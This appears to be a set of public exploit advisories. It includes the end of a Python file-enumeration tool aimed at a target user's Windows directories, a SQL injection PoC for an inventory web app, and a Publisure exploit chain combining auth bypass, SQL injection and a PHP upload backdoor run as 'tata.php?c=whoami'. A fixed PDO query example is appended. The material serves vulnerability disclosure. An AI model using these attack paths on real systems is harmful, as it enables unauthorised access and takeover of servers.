                    ntsins(APPDATA_DIR,args,i)
                #all default user dirs
                else:
                    ntsins(USER_DIRS,args,i)


def check_dir_input(_dir):
    if len(re.findall(r":", _dir)) != 0:
        print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
        return False
    return True


def main(args):
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    if args.examples:
        usage()
        exit()
    if not args.user:
        print "[!] No target user specified see Help -h"
        exit()
    if args.appdata and args.directory:
        print "[!] Multiple search directories supplied see Help -h"
        exit()
    if args.specific_ext:
        if "." not in args.specific_ext:
            print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
            exit()
    if args.artifact and args.artifacts_from_file:
        print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
        exit()
    if args.built_in_ext and args.specific_ext:
        print "\t[!] Both specific and built-in extensions supplied, use only one."
        exit()
    if args.specific_ext and not args.artifacts_from_file:
        print "\t[!] -x to be used with -f flag only see Help -h."
        exit()
    if args.artifact:
        if args.artifact.rfind(".")==-1:
            print "\t[!] Artifacts must contain a .ext or will result in false positives."
            exit()
    if args.directory:
        if not check_dir_input(args.directory):
            exit()
    if args.artifacts_from_file:
        artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)
    if not args.artifact and not args.artifacts_from_file:
        print "[!] Exiting, no artifacts supplied see Help -h"
        exit()
    else:
        search(args)
    if sin_cnt >= 1 and args.zone_identifier:
        zone_identifier_check(args)
    if args.save and len(found_set) != 0 and not args.zone_identifier:
        save()
    if args.save and len(zone_set) != 0:
        found_set.update(zone_set)
        save()
    print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"
    if args.zone_identifier and internet_sin_cnt >= 1:
        print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n"
    if not args.notfound:
        print "\tuse -n to display unfound enumerated files."
    if not args.built_in_ext:
        print "\tfor extra search coverage try -b flag or targeted artifact search -a."


if __name__ == "__main__":
    print BANNER
    parser = argparse.ArgumentParser()
    main(parse_args())

[POC Video URL]
https://www.youtube.com/watch?v=rm8kEbewqpI

[Network Access]
Remote/Local

[Severity]
Low

[Disclosure Timeline]
Vendor Notification: July 29, 2019
MSRC "does not meet the bar for security servicing" : July 29, 2019
September 5, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  24.
# Exploit Title: Inventory Webapp SQL injection
# Date: 05.09.2019
# Exploit Author: mohammad zaheri
# Vendor Homepage: https://github.com/edlangley/inventory-webapp
# Tested on: Windows
# Google Dork: N/A

=========
Vulnerable Page:
=========

/php/add-item.php

==========
Vulnerable Source:
==========

Line39: $name = $_GET["name"];
Line39: $description = $_GET["description"];
Line39: $quantity = $_GET["quantity"];
Line39: $cat_id = $_GET["cat_id"];
Line49: if(mysql_query($itemquery, $conn))

=========
POC:
=========

http://site.com/php/add-item.php?itemquery=[SQL]

=========
Contact Me :
=========

Telegram : @m_zhrii
Email : [email protected]
  25.
#####################################################################################
# Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain]
# Google Dork: [N/A]
# Date: [05/09/2019]
# Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company]
# Vendor Homepage: [https://www.publisure.com/]
# Software Link: [N/C]
# Version: [version 2.1.2]
# Tested on: [Windows 7 Enterprise]
# CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254]
#####################################################################################
# Improper Access Control
#
# CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
# OVE ID: OVE-20190724-0002
# CVE ID: CVE-2019-14253
#
#####################################################################################
# (Pre-Authenticated) Multiple SQL injections
#
# CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)
# OVE ID: OVE-20190724-0003
# CVE ID: CVE-2019-14254
#
#####################################################################################
# Unrestricted File Upload RCE
#
# CVSSv3: 9.1 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
# OVE ID: OVE-20190724-0004
# CVE ID: CVE-2019-14252
#
#####################################################################################
# Fixes:
# Upgrade to latest product version and/or contact support for patches
#####################################################################################

I. PRODUCT

Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization. The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution.

Note that this advisory is based on version 2.1.2, which is a legacy version since a newer one was released.

II. ADVISORY

A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting the Publisure application.

III. VULNERABILITIES DESCRIPTIONS

a) The first issue permits bypassing the authentication mechanism, allowing a malicious person to perform queries on PHP forms within the /AdminDir folder that should be restricted.

b) The second weakness is that SQL queries are not well sanitized, resulting in multiple SQL injections in "userAccFunctions.php" functions. Using these two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example).

c) Once successfully authenticated as an administrator, he is able to inject a PHP backdoor by using the "adminCons.php" form. This backdoor will then be stored in the E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from the "adminCons.php" view (permitting to hide the malicious PHP file).

IV. PROOF OF CONCEPT

a) Access to AdminDir PHP scripts and database querying is possible without authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2)

b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli

"editUser.php" vulnerable code:

$user = getUserDtails($_GET['id']);

"userAccFunctions.php" vulnerable code example:

function getUserDtails($id)
{
    global $db;
    //The reseller_accounts table has been used to store department information since PDQit
    $Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id";
    $R = $db->query($Q);
    return $R;
}

c) The "adminCons.php" form permits uploads leading to RCE and allows an attacker to hide malicious PHP code stored within the "/AdminDir/Templates" folder (ex: http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami)

V. RECOMMENDATIONS

a) Restrict access to administrative (and other) folders when not authenticated.
b) Prepare SQL queries before execution using PDO to prevent injection.
c) Check file type on file upload forms to prevent PHP code upload instead of templates.

VI. TIMELINE

July 23rd, 2019: Vulnerability identification
July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement
August 13th, 2019: Contact to vendor to ask for fix - no reply
September 04th, 2019: Vendor was informed 24h before public disclosure
September 05th, 2019: public disclosure after 45 days

VIII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this advisory. The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy
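As an added illustration of recommendation b) above (example code written for this page, not Publisure's own), the advisory's getUserDtails() query beside a version that validates the id and binds it through a PDO prepared statement; the $pdo connection, the function names and the inline usage are assumptions, while the table and column names are the ones quoted in the advisory:

```php
<?php
// Added example, not Publisure's code. Assumes $pdo is an open PDO connection
// created with PDO::ATTR_EMULATE_PREPARES => false so the bound value travels
// separately from the SQL text instead of being spliced into it client-side.

// Vulnerable shape from the advisory: $id is interpolated into the statement,
// so a value such as "2 OR 1=1" or a UNION clause rewrites the query itself.
function getUserDetailsVulnerable($db, $id)
{
    $Q = "SELECT a.username, a.password FROM accounts a, reseller_accounts r "
       . "WHERE r.record_id = a.reseller_id AND a.record_id = $id";
    return $db->query($Q);
}

// Hardened form: the record id must be a positive integer and is bound as a
// typed parameter, so the statement text is fixed no matter what the client
// sends. Returns the account row, or null for an invalid or unknown id.
function getUserDetailsSafe(PDO $pdo, $id)
{
    // Reject anything that is not a positive integer before touching the database.
    $validId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($validId === false) {
        return null;
    }

    $sql = "SELECT a.username, a.contact_firstname, a.contact_lastname, a.email, "
         . "r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, "
         . "a.reseller_id, a.approval, a.resourceEditType, a.docView "
         . "FROM accounts a "
         . "JOIN reseller_accounts r ON r.record_id = a.reseller_id "
         . "WHERE a.record_id = :id";

    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':id', $validId, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Assumed call site replacing the one in editUser.php; DSN and credentials are
// placeholders, and the page must still require an authenticated admin session.
$pdo = new PDO('mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$user = getUserDetailsSafe($pdo, isset($_GET['id']) ? $_GET['id'] : '');
```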